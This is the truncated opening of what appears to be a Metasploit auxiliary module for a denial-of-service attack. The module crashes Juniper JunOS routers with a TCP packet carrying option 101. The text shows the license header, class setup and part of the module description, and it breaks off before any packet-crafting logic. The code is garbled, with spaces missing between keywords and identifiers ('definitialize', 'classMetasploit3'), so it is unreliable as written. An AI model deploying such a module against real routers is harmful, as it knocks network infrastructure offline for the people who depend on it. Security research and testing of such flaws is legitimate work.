# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require'msf/core'
require'racket'
classMetasploit3<Msf::Auxiliary
includeMsf::Exploit::Capture
includeMsf::Auxiliary::Dos
# The whole point is to cause a router crash.
Rank=LowRanking
definitialize
super(
'Name'=>'Juniper JunOS Malformed TCP Option',
'Description'=>%q{ This module exploits a denial of service vulnerability in Juniper Network's JunOS router operating system. By sending a TCP packet with TCP option 101 set, an attacker can cause an affected router to reboot.